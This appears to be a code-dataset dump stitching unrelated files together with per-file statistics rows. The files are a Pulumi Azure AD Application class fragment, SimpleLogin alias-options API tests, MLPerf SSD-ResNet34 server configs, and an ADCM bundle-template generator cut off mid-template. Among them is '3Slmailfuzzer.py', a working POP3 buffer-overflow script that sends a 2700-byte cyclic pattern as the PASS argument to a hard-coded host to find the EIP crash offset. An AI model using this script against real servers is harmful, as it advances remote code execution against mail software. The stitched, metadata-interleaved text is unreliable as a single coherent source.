        :param pulumi.Input[pulumi.InputType['ApplicationWebArgs']] web: A `web` block as documented below, which configures web related settings for this application.
        """
        # Merge the caller's options with the resource ID so the engine
        # performs a lookup rather than a create.
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _ApplicationState.__new__(_ApplicationState)

        __props__.__dict__["api"] = api
        __props__.__dict__["app_role_ids"] = app_role_ids
        __props__.__dict__["app_roles"] = app_roles
        __props__.__dict__["application_id"] = application_id
        __props__.__dict__["device_only_auth_enabled"] = device_only_auth_enabled
        __props__.__dict__["disabled_by_microsoft"] = disabled_by_microsoft
        __props__.__dict__["display_name"] = display_name
        __props__.__dict__["fallback_public_client_enabled"] = fallback_public_client_enabled
        __props__.__dict__["feature_tags"] = feature_tags
        __props__.__dict__["group_membership_claims"] = group_membership_claims
        __props__.__dict__["identifier_uris"] = identifier_uris
        __props__.__dict__["logo_image"] = logo_image
        __props__.__dict__["logo_url"] = logo_url
        __props__.__dict__["marketing_url"] = marketing_url
        __props__.__dict__["oauth2_permission_scope_ids"] = oauth2_permission_scope_ids
        __props__.__dict__["oauth2_post_response_required"] = oauth2_post_response_required
        __props__.__dict__["object_id"] = object_id
        __props__.__dict__["optional_claims"] = optional_claims
        __props__.__dict__["owners"] = owners
        __props__.__dict__["prevent_duplicate_names"] = prevent_duplicate_names
        __props__.__dict__["privacy_statement_url"] = privacy_statement_url
        __props__.__dict__["public_client"] = public_client
        __props__.__dict__["publisher_domain"] = publisher_domain
        __props__.__dict__["required_resource_accesses"] = required_resource_accesses
        __props__.__dict__["sign_in_audience"] = sign_in_audience
        __props__.__dict__["single_page_application"] = single_page_application
        __props__.__dict__["support_url"] = support_url
        __props__.__dict__["tags"] = tags
        __props__.__dict__["template_id"] = template_id
        __props__.__dict__["terms_of_service_url"] = terms_of_service_url
        __props__.__dict__["web"] = web
        return Application(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter
    def api(self) -> pulumi.Output[Optional['outputs.ApplicationApi']]:
        """
        An `api` block as documented below, which configures API related settings for this application.
        """
        return pulumi.get(self, "api")

    @property
    @pulumi.getter(name="appRoleIds")
    def app_role_ids(self) -> pulumi.Output[Mapping[str, str]]:
        """
        A mapping of app role values to app role IDs, intended to be useful when referencing app roles in other resources in your configuration.
        """
        return pulumi.get(self, "app_role_ids")

    @property
    @pulumi.getter(name="appRoles")
    def app_roles(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationAppRole']]]:
        """
        A collection of `app_role` blocks as documented below. For more information see [official documentation on Application Roles](https://docs.microsoft.com/en-us/azure/architecture/multitenant-identity/app-roles).
        """
        return pulumi.get(self, "app_roles")

    @property
    @pulumi.getter(name="applicationId")
    def application_id(self) -> pulumi.Output[str]:
        """
        The Application ID (also called Client ID).
        """
        return pulumi.get(self, "application_id")

    @property
    @pulumi.getter(name="deviceOnlyAuthEnabled")
    def device_only_auth_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies whether this application supports device authentication without a user. Defaults to `false`.
        """
        return pulumi.get(self, "device_only_auth_enabled")

    @property
    @pulumi.getter(name="disabledByMicrosoft")
    def disabled_by_microsoft(self) -> pulumi.Output[str]:
        """
        Whether Microsoft has disabled the registered application. If the application is disabled, this will be a string indicating the status/reason, e.g. `DisabledDueToViolationOfServicesAgreement`
        """
        return pulumi.get(self, "disabled_by_microsoft")

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> pulumi.Output[str]:
        """
        The display name for the application.
        """
        return pulumi.get(self, "display_name")

    @property
    @pulumi.getter(name="fallbackPublicClientEnabled")
    def fallback_public_client_enabled(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies whether the application is a public client. Appropriate for apps using token grant flows that don't use a redirect URI. Defaults to `false`.
        """
        return pulumi.get(self, "fallback_public_client_enabled")

    @property
    @pulumi.getter(name="featureTags")
    def feature_tags(self) -> pulumi.Output[Sequence['outputs.ApplicationFeatureTag']]:
        """
        A `feature_tags` block as described below. Cannot be used together with the `tags` property.
        """
        return pulumi.get(self, "feature_tags")

    @property
    @pulumi.getter(name="groupMembershipClaims")
    def group_membership_claims(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        Configures the `groups` claim issued in a user or OAuth 2.0 access token that the app expects. Possible values are `None`, `SecurityGroup`, `DirectoryRole`, `ApplicationGroup` or `All`.
        """
        return pulumi.get(self, "group_membership_claims")

    @property
    @pulumi.getter(name="identifierUris")
    def identifier_uris(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A set of user-defined URI(s) that uniquely identify an application within its Azure AD tenant, or within a verified custom domain if the application is multi-tenant.
        """
        return pulumi.get(self, "identifier_uris")

    @property
    @pulumi.getter(name="logoImage")
    def logo_image(self) -> pulumi.Output[Optional[str]]:
        """
        A logo image to upload for the application, as a raw base64-encoded string. The image should be in gif, jpeg or png format. Note that once an image has been uploaded, it is not possible to remove it without replacing it with another image.
        """
        return pulumi.get(self, "logo_image")

    @property
    @pulumi.getter(name="logoUrl")
    def logo_url(self) -> pulumi.Output[str]:
        """
        CDN URL to the application's logo, as uploaded with the `logo_image` property.
        """
        return pulumi.get(self, "logo_url")

    @property
    @pulumi.getter(name="marketingUrl")
    def marketing_url(self) -> pulumi.Output[Optional[str]]:
        """
        URL of the application's marketing page.
        """
        return pulumi.get(self, "marketing_url")

    @property
    @pulumi.getter(name="oauth2PermissionScopeIds")
    def oauth2_permission_scope_ids(self) -> pulumi.Output[Mapping[str, str]]:
        """
        A mapping of OAuth2.0 permission scope values to scope IDs, intended to be useful when referencing permission scopes in other resources in your configuration.
        """
        return pulumi.get(self, "oauth2_permission_scope_ids")

    @property
    @pulumi.getter(name="oauth2PostResponseRequired")
    def oauth2_post_response_required(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies whether, as part of OAuth 2.0 token requests, Azure AD allows POST requests, as opposed to GET requests. Defaults to `false`, which specifies that only GET requests are allowed.
        """
        return pulumi.get(self, "oauth2_post_response_required")

    @property
    @pulumi.getter(name="objectId")
    def object_id(self) -> pulumi.Output[str]:
        """
        The application's object ID.
        """
        return pulumi.get(self, "object_id")

    @property
    @pulumi.getter(name="optionalClaims")
    def optional_claims(self) -> pulumi.Output[Optional['outputs.ApplicationOptionalClaims']]:
        """
        An `optional_claims` block as documented below.
        """
        return pulumi.get(self, "optional_claims")

    @property
    @pulumi.getter
    def owners(self) -> pulumi.Output[Optional[Sequence[str]]]:
        """
        A set of object IDs of principals that will be granted ownership of the application. Supported object types are users or service principals. By default, no owners are assigned.
        """
        return pulumi.get(self, "owners")

    @property
    @pulumi.getter(name="preventDuplicateNames")
    def prevent_duplicate_names(self) -> pulumi.Output[Optional[bool]]:
        """
        If `true`, will return an error if an existing application is found with the same name. Defaults to `false`.
        """
        return pulumi.get(self, "prevent_duplicate_names")

    @property
    @pulumi.getter(name="privacyStatementUrl")
    def privacy_statement_url(self) -> pulumi.Output[Optional[str]]:
        """
        URL of the application's privacy statement.
        """
        return pulumi.get(self, "privacy_statement_url")

    @property
    @pulumi.getter(name="publicClient")
    def public_client(self) -> pulumi.Output[Optional['outputs.ApplicationPublicClient']]:
        """
        A `public_client` block as documented below, which configures non-web app or non-web API application settings, for example mobile or other public clients such as an installed application running on a desktop device.
        """
        return pulumi.get(self, "public_client")

    @property
    @pulumi.getter(name="publisherDomain")
    def publisher_domain(self) -> pulumi.Output[str]:
        """
        The verified publisher domain for the application.
        """
        return pulumi.get(self, "publisher_domain")

    @property
    @pulumi.getter(name="requiredResourceAccesses")
    def required_resource_accesses(self) -> pulumi.Output[Optional[Sequence['outputs.ApplicationRequiredResourceAccess']]]:
        """
        A collection of `required_resource_access` blocks as documented below.
        """
        return pulumi.get(self, "required_resource_accesses")

    @property
    @pulumi.getter(name="signInAudience")
    def sign_in_audience(self) -> pulumi.Output[Optional[str]]:
        """
        The Microsoft account types that are supported for the current application. Must be one of `AzureADMyOrg`, `AzureADMultipleOrgs`, `AzureADandPersonalMicrosoftAccount` or `PersonalMicrosoftAccount`. Defaults to `AzureADMyOrg`.
        """
        return pulumi.get(self, "sign_in_audience")

    @property
    @pulumi.getter(name="singlePageApplication")
    def single_page_application(self) -> pulumi.Output[Optional['outputs.ApplicationSinglePageApplication']]:
        """
        A `single_page_application` block as documented below, which configures single-page application (SPA) related settings for this application.
        """
        return pulumi.get(self, "single_page_application")

    @property
    @pulumi.getter(name="supportUrl")
    def support_url(self) -> pulumi.Output[Optional[str]]:
        """
        URL of the application's support page.
        """
        return pulumi.get(self, "support_url")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Sequence[str]]:
        """
        A set of tags to apply to the application. Cannot be used together with the `feature_tags` block.
        """
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="templateId")
    def template_id(self) -> pulumi.Output[str]:
        """
        Unique ID for a templated application in the Azure AD App Gallery, from which to create the application. Changing this forces a new resource to be created.
        """
        return pulumi.get(self, "template_id")

    @property
    @pulumi.getter(name="termsOfServiceUrl")
    def terms_of_service_url(self) -> pulumi.Output[Optional[str]]:
        """
        URL of the application's terms of service statement.
        """
        return pulumi.get(self, "terms_of_service_url")

    @property
    @pulumi.getter
    def web(self) -> pulumi.Output[Optional['outputs.ApplicationWeb']]:
        """
        A `web` block as documented below, which configures web related settings for this application.
        """
        return pulumi.get(self, "web")
| 58.672917
| 317
| 0.700245
| 10,205
| 84,489
| 5.584713
| 0.037139
| 0.088977
| 0.080345
| 0.039918
| 0.960012
| 0.948063
| 0.939974
| 0.932131
| 0.926867
| 0.906724
| 0
| 0.002489
| 0.201032
| 84,489
| 1,439
| 318
| 58.71369
| 0.841787
| 0.373623
| 0
| 0.843429
| 1
| 0
| 0.152001
| 0.089843
| 0
| 0
| 0
| 0
| 0
| 1
| 0.169143
| false
| 0.001143
| 0.008
| 0
| 0.28
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
53930622e594b5c73e5c4b94b97cf6a64d9763e5
| 3,087
|
py
|
Python
|
application/scripts/3Slmailfuzzer.py
|
cys3c/viper-shell
|
e05a07362b7d1e6d73c302a24d2506846e43502c
|
[
"PSF-2.0",
"BSD-2-Clause"
] | 2
|
2018-06-30T03:21:30.000Z
|
2020-03-22T02:31:02.000Z
|
application/scripts/3Slmailfuzzer.py
|
cys3c/viper-shell
|
e05a07362b7d1e6d73c302a24d2506846e43502c
|
[
"PSF-2.0",
"BSD-2-Clause"
] | null | null | null |
application/scripts/3Slmailfuzzer.py
|
cys3c/viper-shell
|
e05a07362b7d1e6d73c302a24d2506846e43502c
|
[
"PSF-2.0",
"BSD-2-Clause"
] | 3
|
2017-11-15T11:08:20.000Z
|
2020-03-22T02:31:03.000Z
|
#!/usr/bin/python
"""POP3 PASS-command buffer-overflow fuzzer.

Connects to a POP3 service and sends a long cyclic pattern as the PASS
argument; a debugger attached to the target can then recover the EIP
offset from the unique pattern bytes found in the crash dump.

Fixes over the original:
- Python 3 syntax (``print()`` function, ``bytes`` on the wire).
- The 2700-char cyclic pattern is generated deterministically instead of
  being a giant inline literal.
- The socket is always closed (context manager) and ``sendall`` is used
  so partial sends cannot silently truncate the payload.
- The bare ``except:`` is narrowed to ``OSError`` (socket failures).
"""
import socket
import string
from itertools import product

TARGET_HOST = '10.11.4.94'   # lab target from the original script -- adjust as needed
TARGET_PORT = 110            # POP3
PATTERN_LENGTH = 2700        # crash length hinted by the original "#buffer = 'A' * 2700"


def make_pattern(length=PATTERN_LENGTH):
    """Return a Metasploit-style cyclic pattern ("Aa0Aa1Aa2...") of *length* chars.

    Each (Upper, lower, digit) triple is unique, so any 4+ consecutive
    bytes pinpoint a unique offset within the pattern.
    """
    triples = product(string.ascii_uppercase, string.ascii_lowercase, string.digits)
    full = ''.join(u + lo + d for u, lo, d in triples)
    return full[:length]


def main():
    """Send the oversized PASS buffer to the target POP3 service."""
    evil = make_pattern()
    try:
        # Context manager guarantees the socket is closed on any exit path.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            print("\nSending evil buffer...")
            s.connect((TARGET_HOST, TARGET_PORT))
            s.recv(1024)                     # consume the server banner
            s.sendall(b'USER username\r\n')
            s.recv(1024)                     # consume the USER response
            s.sendall(b'PASS ' + evil.encode('ascii') + b'\r\n')
            print("\nDone!.")
    except OSError:
        # Connection refused / reset / timed out -- target likely down or crashed.
        print("Could not connect to POP3!")


if __name__ == "__main__":
    main()
| 171.5
| 2,711
| 0.949789
| 60
| 3,087
| 48.833333
| 0.65
| 0.008191
| 0.006143
| 0.008874
| 0.012287
| 0.012287
| 0
| 0
| 0
| 0
| 0
| 0.306848
| 0.025591
| 3,087
| 17
| 2,712
| 181.588235
| 0.667221
| 0.011338
| 0
| 0.153846
| 0
| 0
| 0.916066
| 0.885246
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0.076923
| 0.076923
| null | null | 0.230769
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
539a21d3c4b2014e9b4ca2d9ba47360d77824b92
| 5,861
|
py
|
Python
|
tests/api/test_alias_options.py
|
itsmechlark/simple-login-app
|
0121806301493615c052bfe6b254abc780824a99
|
[
"MIT"
] | 1
|
2020-11-21T11:18:21.000Z
|
2020-11-21T11:18:21.000Z
|
tests/api/test_alias_options.py
|
GanpatiRathia/app
|
f274bac053ce56fbbad0d87d0e57fec4eaae90ac
|
[
"MIT"
] | 1
|
2021-02-08T21:04:06.000Z
|
2021-02-08T21:04:06.000Z
|
tests/api/test_alias_options.py
|
itsmechlark/simple-login-app
|
0121806301493615c052bfe6b254abc780824a99
|
[
"MIT"
] | null | null | null |
from flask import url_for
from app.extensions import db
from app.models import User, ApiKey, AliasUsedOn, Alias
def test_different_scenarios(flask_client):
    """Exercise GET /api/options: no hostname, with hostname, and with a recommendation."""
    user = User.create(
        email="a@b.c", password="password", name="Test User", activated=True
    )
    db.session.commit()

    # create api_key
    api_key = ApiKey.create(user.id, "for test")
    db.session.commit()

    # <<< without hostname >>>
    r = flask_client.get(
        url_for("api.options"), headers={"Authentication": api_key.code}
    )
    # Example response shape:
    # {
    #   "can_create_custom": True,
    #   "custom": {"suffixes": ["azdwbw@sl.local"], "suggestion": ""},
    #   "existing": ["cat_cat_cat@sl.local"],
    # }
    assert r.status_code == 200
    assert r.json["can_create_custom"]
    assert len(r.json["existing"]) == 1
    assert len(r.json["custom"]["suffixes"]) == 4
    assert r.json["custom"]["suggestion"] == ""  # no hostname => no suggestion

    # <<< with hostname >>>
    r = flask_client.get(
        url_for("api.options", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    # Suggestion is derived from the hostname -- "www.test.com" -> "test".
    assert r.json["custom"]["suggestion"] == "test"

    # <<< with recommendation >>>
    # Recording an AliasUsedOn for this hostname makes the endpoint recommend that alias.
    alias = Alias.create_new(user, prefix="test")
    db.session.commit()
    AliasUsedOn.create(alias_id=alias.id, hostname="www.test.com", user_id=user.id)
    db.session.commit()
    r = flask_client.get(
        url_for("api.options", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["recommendation"]["alias"] == alias.email
    assert r.json["recommendation"]["hostname"] == "www.test.com"
def test_different_scenarios_v2(flask_client):
    """Same scenarios as v1, against the flattened /api/options_v2 response shape."""
    user = User.create(
        email="a@b.c", password="password", name="Test User", activated=True
    )
    db.session.commit()

    # create api_key
    api_key = ApiKey.create(user.id, "for test")
    db.session.commit()

    # <<< without hostname >>>
    r = flask_client.get(
        url_for("api.options_v2"), headers={"Authentication": api_key.code}
    )
    assert r.status_code == 200
    # Example response shape:
    # {'can_create': True, 'existing': ['my-first-alias.chat@sl.local'], 'prefix_suggestion': '', 'suffixes': ['.meo@sl.local']}
    assert r.json["can_create"]
    assert len(r.json["existing"]) == 1
    assert r.json["suffixes"]
    assert r.json["prefix_suggestion"] == ""  # no hostname => no suggestion

    # <<< with hostname >>>
    r = flask_client.get(
        url_for("api.options_v2", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["prefix_suggestion"] == "test"

    # <<< with recommendation >>>
    alias = Alias.create_new(user, prefix="test")
    db.session.commit()
    AliasUsedOn.create(
        alias_id=alias.id, hostname="www.test.com", user_id=alias.user_id
    )
    db.session.commit()
    r = flask_client.get(
        url_for("api.options_v2", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["recommendation"]["alias"] == alias.email
    assert r.json["recommendation"]["hostname"] == "www.test.com"
def test_different_scenarios_v3(flask_client):
    """Same scenarios against /api/options_v3 (no exact count assertion on existing aliases)."""
    user = User.create(
        email="a@b.c", password="password", name="Test User", activated=True
    )
    db.session.commit()

    # create api_key
    api_key = ApiKey.create(user.id, "for test")
    db.session.commit()

    # <<< without hostname >>>
    r = flask_client.get(
        url_for("api.options_v3"), headers={"Authentication": api_key.code}
    )
    assert r.status_code == 200
    assert r.json["can_create"]
    assert r.json["suffixes"]
    assert r.json["prefix_suggestion"] == ""  # no hostname => no suggestion

    # <<< with hostname >>>
    r = flask_client.get(
        url_for("api.options_v3", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["prefix_suggestion"] == "test"

    # <<< with recommendation >>>
    alias = Alias.create_new(user, prefix="test")
    db.session.commit()
    AliasUsedOn.create(
        alias_id=alias.id, hostname="www.test.com", user_id=alias.user_id
    )
    db.session.commit()
    r = flask_client.get(
        url_for("api.options_v3", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["recommendation"]["alias"] == alias.email
    assert r.json["recommendation"]["hostname"] == "www.test.com"
def test_different_scenarios_v4(flask_client):
    """Same scenarios against /api/options_v4, which returns (suffix, signed_suffix) pairs."""
    user = User.create(
        email="a@b.c", password="password", name="Test User", activated=True
    )
    db.session.commit()

    # create api_key
    api_key = ApiKey.create(user.id, "for test")
    db.session.commit()

    # <<< without hostname >>>
    r = flask_client.get(
        url_for("api.options_v4"), headers={"Authentication": api_key.code}
    )
    assert r.status_code == 200
    assert r.json["can_create"]
    assert r.json["suffixes"]
    assert r.json["prefix_suggestion"] == ""  # no hostname => no suggestion

    # v4 signs each suffix; the signed form embeds the plain suffix as a prefix.
    for (suffix, signed_suffix) in r.json["suffixes"]:
        assert signed_suffix.startswith(suffix)

    # <<< with hostname >>>
    r = flask_client.get(
        url_for("api.options_v4", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["prefix_suggestion"] == "test"

    # <<< with recommendation >>>
    alias = Alias.create_new(user, prefix="test")
    db.session.commit()
    AliasUsedOn.create(
        alias_id=alias.id, hostname="www.test.com", user_id=alias.user_id
    )
    db.session.commit()
    r = flask_client.get(
        url_for("api.options_v4", hostname="www.test.com"),
        headers={"Authentication": api_key.code},
    )
    assert r.json["recommendation"]["alias"] == alias.email
    assert r.json["recommendation"]["hostname"] == "www.test.com"
| 30.21134
| 128
| 0.625661
| 738
| 5,861
| 4.823848
| 0.100271
| 0.05309
| 0.071067
| 0.080899
| 0.893539
| 0.878371
| 0.872753
| 0.858146
| 0.858146
| 0.858146
| 0
| 0.005794
| 0.204914
| 5,861
| 193
| 129
| 30.367876
| 0.758155
| 0.1266
| 0
| 0.713178
| 0
| 0
| 0.211705
| 0
| 0
| 0
| 0
| 0
| 0.24031
| 1
| 0.031008
| false
| 0.031008
| 0.023256
| 0
| 0.054264
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
539b21f72814c2bddd69a3b1f979ce7d8fb22d71
| 3,864
|
py
|
Python
|
closed/HPE/configs/ssd-resnet34/Server/__init__.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 12
|
2021-09-23T08:05:57.000Z
|
2022-03-21T03:52:11.000Z
|
closed/HPE/configs/ssd-resnet34/Server/__init__.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 11
|
2021-09-23T20:34:06.000Z
|
2022-01-22T07:58:02.000Z
|
closed/HPE/configs/ssd-resnet34/Server/__init__.py
|
ctuning/inference_results_v1.1
|
d9176eca28fcf6d7a05ccb97994362a76a1eb5ab
|
[
"Apache-2.0"
] | 16
|
2021-09-23T20:26:38.000Z
|
2022-03-09T12:59:56.000Z
|
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.getcwd())
from code.common.constants import Benchmark, Scenario
from code.common.system_list import System, Architecture, MIGConfiguration, MIGSlice
from configs.configuration import *
@ConfigRegistry.register(HarnessType.LWIS, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx4(BenchmarkConfiguration):
    # SSD-ResNet34 Server-scenario config for a 4x A100-SXM-80GB system, LWIS harness.
    system = System("A100-SXM-80GB", Architecture.Ampere, 4)
    active_sms = 100
    gpu_copy_streams = 4
    input_dtype = "int8"
    input_format = "linear"
    map_path = "data_maps/coco/val_map.txt"
    precision = "int8"
    tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
    use_deque_limit = True
    use_graphs = False
    deque_timeout_usec = 30000
    gpu_batch_size = 8
    gpu_inference_streams = 4
    # Target queries-per-second for the Server scenario load generator.
    server_target_qps = 3700
    start_from_device = False
    use_cuda_thread_per_device = True
    scenario = Scenario.Server
    benchmark = Benchmark.SSDResNet34
@ConfigRegistry.register(HarnessType.Triton, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx4_Triton(BenchmarkConfiguration):
    # Triton-harness variant of A100_SXM_80GBx4; lower QPS target than the LWIS config.
    system = System("A100-SXM-80GB", Architecture.Ampere, 4)
    active_sms = 100
    gpu_copy_streams = 4
    input_dtype = "int8"
    input_format = "linear"
    map_path = "data_maps/coco/val_map.txt"
    precision = "int8"
    tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
    use_deque_limit = True
    use_graphs = False
    deque_timeout_usec = 30000
    gpu_batch_size = 8
    gpu_inference_streams = 4
    server_target_qps = 3550
    use_cuda_thread_per_device = True
    scenario = Scenario.Server
    benchmark = Benchmark.SSDResNet34
    instance_group_count = 4
    use_triton = True
@ConfigRegistry.register(HarnessType.LWIS, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx8(BenchmarkConfiguration):
    # SSD-ResNet34 Server-scenario config for an 8x A100-SXM-80GB system, LWIS harness.
    system = System("A100-SXM-80GB", Architecture.Ampere, 8)
    active_sms = 100
    gpu_copy_streams = 4
    input_dtype = "int8"
    input_format = "linear"
    map_path = "data_maps/coco/val_map.txt"
    precision = "int8"
    tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
    use_deque_limit = True
    use_graphs = False
    deque_timeout_usec = 30000
    gpu_batch_size = 8
    gpu_inference_streams = 4
    # Roughly 2x the 4-GPU target, matching the doubled GPU count.
    server_target_qps = 7650
    start_from_device = False
    use_cuda_thread_per_device = True
    scenario = Scenario.Server
    benchmark = Benchmark.SSDResNet34
@ConfigRegistry.register(HarnessType.Triton, AccuracyTarget.k_99, PowerSetting.MaxP)
class A100_SXM_80GBx8_Triton(BenchmarkConfiguration):
    # Triton-harness variant of A100_SXM_80GBx8; lower QPS target than the LWIS config.
    system = System("A100-SXM-80GB", Architecture.Ampere, 8)
    active_sms = 100
    gpu_copy_streams = 4
    input_dtype = "int8"
    input_format = "linear"
    map_path = "data_maps/coco/val_map.txt"
    precision = "int8"
    tensor_path = "${PREPROCESSED_DATA_DIR}/coco/val2017/SSDResNet34/int8_linear"
    use_deque_limit = True
    use_graphs = False
    deque_timeout_usec = 30000
    gpu_batch_size = 8
    gpu_inference_streams = 4
    server_target_qps = 7100
    use_cuda_thread_per_device = True
    scenario = Scenario.Server
    benchmark = Benchmark.SSDResNet34
    instance_group_count = 4
    use_triton = True
| 34.5
| 84
| 0.744306
| 509
| 3,864
| 5.388998
| 0.302554
| 0.020416
| 0.048122
| 0.042289
| 0.756836
| 0.756836
| 0.756836
| 0.756836
| 0.756836
| 0.743711
| 0
| 0.05374
| 0.176501
| 3,864
| 111
| 85
| 34.810811
| 0.808297
| 0.15088
| 0
| 0.840909
| 0
| 0
| 0.139578
| 0.10652
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.056818
| 0
| 0.943182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
54faac912efb01f8259261196f20175f466d2d0c
| 5,938
|
py
|
Python
|
tests/functional/test_import_data/config_generator_positive.py
|
arenadata/adcm
|
a499caa30adc2a53e7b3f46c96a865f9e4079e4e
|
[
"Apache-2.0"
] | 16
|
2019-11-28T18:05:21.000Z
|
2021-12-08T18:09:18.000Z
|
tests/functional/test_import_data/config_generator_positive.py
|
arenadata/adcm
|
a499caa30adc2a53e7b3f46c96a865f9e4079e4e
|
[
"Apache-2.0"
] | 1,127
|
2019-11-29T08:57:25.000Z
|
2022-03-31T20:21:32.000Z
|
tests/functional/test_import_data/config_generator_positive.py
|
arenadata/adcm
|
a499caa30adc2a53e7b3f46c96a865f9e4079e4e
|
[
"Apache-2.0"
] | 10
|
2019-11-28T18:05:06.000Z
|
2022-01-13T06:16:40.000Z
|
import os

# Each tuple drives one generated import/export bundle pair.  Based on how the
# values are substituted into the templates below:
#   (min_bound_value, max_bound_value, max_constraint_key, min_constraint_key,
#    version_declared_by_the_export_bundle)
# The *_strict keys exercise exclusive version bounds -- TODO(review): confirm
# against ADCM's version-constraint semantics.
VARIABLES = [
    ("2.2", "3.0", 'max', 'min', "2.5"),
    ("2.2", "3.0", 'max', 'min_strict', "3.0"),
    ("2.2", "3.0", 'max_strict', 'min_strict', "2.5"),
    ("2.2", "3.0", 'max_strict', 'min', "2.2"),
]
# NOTE(review): the YAML indentation inside these template literals appears to
# have been lost during extraction; the nesting below must be restored to valid
# YAML (config keys indented under their parents) before these templates are
# usable.  The text is otherwise kept byte-for-byte.

# Export-side cluster bundle: cluster version is parameterized via {}.
TEMPLATE_EXPORT_CLUSTER = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: {}
config:
required:
type: integer
required: true
default: 15
str-key:
default: value
type: string
required: false
int_key:
type: integer
required: false
default: 150
export:
- required
- str-key
- int_key
- type: service
name: hadoop
version: 2.1
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
export:
- core-site
- quorum
"""

# Export-side service bundle: hadoop service version is parameterized via {}.
TEMPLATE_EXPORT_SERVICE = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: 1.4
config:
required:
type: integer
required: true
default: 15
str-key:
default: value
type: string
required: false
int_key:
type: integer
required: false
default: 150
export:
- required
- str-key
- int_key
- type: service
name: hadoop
version: {}
config:
core-site:
param1:
type: string
required: false
param2:
type: integer
required: false
quorum:
type: integer
default: 3
export:
- core-site
- quorum
"""

# Import-side bundle with parameterized hadoop version constraints:
# {2}/{3} are the constraint keys (max[_strict]/min[_strict]), {1}/{0} their values.
TEMPLATE_SERVICE = """
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
-
type: cluster
name: ADH
version: 1.6
import:
hadoop:
